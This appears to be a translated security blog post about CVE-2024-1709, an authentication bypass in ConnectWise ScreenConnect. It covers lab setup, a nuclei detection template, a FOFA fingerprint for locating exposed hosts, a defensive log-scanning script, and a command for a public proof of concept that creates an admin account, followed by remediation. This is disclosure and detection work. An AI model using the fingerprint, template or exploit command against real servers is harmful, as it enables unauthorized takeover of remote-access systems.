01 Vulnerability name
02 Affected versions
ConnectWise ScreenConnect 23.9.7 and earlier
03 Vulnerability description
ConnectWise ScreenConnect 23.9.7 and earlier contain an authentication bypass vulnerability: an attacker can bypass authentication through an alternate path or channel. An unauthenticated attacker can use this flaw to register an account, log in to the product's admin console, and then execute operating-system commands through ScreenConnect's built-in functionality, gaining direct access to confidential information or critical systems.
For a detailed analysis of the vulnerability see
https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
04 FOFA query
icon_hash="-82958153"
05 Lab setup
Download the installer for your operating system from the official site:
https://screenconnect.connectwise.com/download/archive
I installed it on CentOS: first upload the package, then extract it
tar -zxvf ScreenConnect_20.3.31734.7751_Release.tar.gz
cd ScreenConnect_20.3.31734.7751_Install
Run the install script
./install.sh
Open the page
http://localhost:8040/Host
Then apply for a free trial license on the official site.
06 Batch verification POC
The nuclei POC file contents are as follows (field names that the extraction dropped, such as cvss-metrics, cvss-score, max-request, shodan-query and matchers-condition, are restored from the standard nuclei template schema):
id: CVE-2024-1709

info:
  name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
  author: johnk3r
  severity: critical
  description: |
    ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
  reference:
    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
    - https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1709
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2024-1709
    cwe-id: CWE-288
  metadata:
    verified: true
    max-request: 1
    vendor: connectwise
    product: screenconnect
    shodan-query: http.favicon.hash:-82958153
  tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev

variables:
  string: "{{rand_text_alpha(10)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/SetupWizard.aspx/{{string}}"

    matchers-condition: and
    matchers:
      # an unpatched server renders the setup wizard for any path below SetupWizard.aspx/
      - type: word
        part: body
        words:
          - "SetupWizardPage"
          - "ContentPanel SetupWizard"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      # record the Server header so the scan output also shows the web server banner
      - type: kval
        part: header
        kval:
          - Server
# digest: 4a0a004730450220564c9949c406c35520203b46a2a34bba505d1cadfde47e8a38f9a073264e97f0022100ff2a065d66fa48b8502a068445d833e6700efd1e9715d034f1ea16e91696bd06:922c64590222798bb761d5b6d8e72950
Run the POC
nuclei.exe -l data/CVE-2024-1709.txt -t mypoc/cve/CVE-2024-1709.yaml
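The same request shape the nuclei template probes for (SetupWizard.aspx followed by a trailing slash and an extra segment) is what a defender should hunt for in the web server access logs of a ScreenConnect host. The following is an added example, not code from the original post: it scans constructed IIS W3C-style log lines for that path and reports whether the wizard was actually served, and it classifies a version string against the 23.9.8 fix. The log field layout and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style (W3C) access log lines for illustration; not from the original post.
# Assumed fields: date time s-ip method uri-stem query port user c-ip user-agent status
SAMPLE_LOG = """\
2024-02-21 10:00:01 10.0.0.5 GET /Login - 443 - 198.51.100.7 Mozilla/5.0 200
2024-02-21 10:00:07 10.0.0.5 GET /SetupWizard.aspx/ - 443 - 198.51.100.7 python-requests/2.31 200
2024-02-21 10:00:09 10.0.0.5 POST /SetupWizard.aspx/abcdefghij - 443 - 198.51.100.7 python-requests/2.31 200
2024-02-21 10:00:15 10.0.0.5 GET /setupwizard.aspx - 443 - 10.0.0.9 Mozilla/5.0 302
2024-02-21 10:01:00 10.0.0.5 GET /App_Themes/Default/Style.css - 443 - 10.0.0.9 Mozilla/5.0 200
"""

# The bypass request is SetupWizard.aspx with a trailing "/" (plus any extra segment);
# a bare /SetupWizard.aspx is the normal first-run page and is not flagged.
BYPASS_PATH = re.compile(r"/setupwizard\.aspx/", re.IGNORECASE)
FIXED_VERSION = (23, 9, 8)  # first fixed release per the vendor bulletin cited above


def is_affected(version: str) -> bool:
    """True when a ScreenConnect version string is 23.9.7 or older."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts < FIXED_VERSION


def scan_log(text: str) -> list[dict]:
    """Return one finding per request that hits the SetupWizard bypass path."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 11:
            continue  # not a complete log record under the assumed layout
        method, uri, client, status = fields[3], fields[4], fields[8], fields[10]
        if not BYPASS_PATH.search(unquote(uri)):  # normalise percent-encoding first
            continue
        findings.append({
            "time": f"{fields[0]} {fields[1]}",
            "client": client,
            "method": method,
            "uri": uri,
            # HTTP 200 means the server rendered the wizard page (an unpatched host);
            # any other status is an attempt that did not get the page
            "outcome": "wizard served" if status == "200" else f"not served ({status})",
        })
    return findings
```

Run `scan_log(SAMPLE_LOG)` against real exported logs after adjusting the field indices to your logging format; every "wizard served" hit on a host that `is_affected()` reports as vulnerable warrants checking the user list for unexpected new accounts.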
07 Exploitation
There is a Python version on GitHub that can add a user
https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
After the user is created, log in to the admin console directly; system commands can be executed.
08 Remediation
Upgrade to 23.9.8 or later.
https://screenconnect.connectwise.com/download
Originally published on the WeChat official account (AI与网安): CVE-2024-1709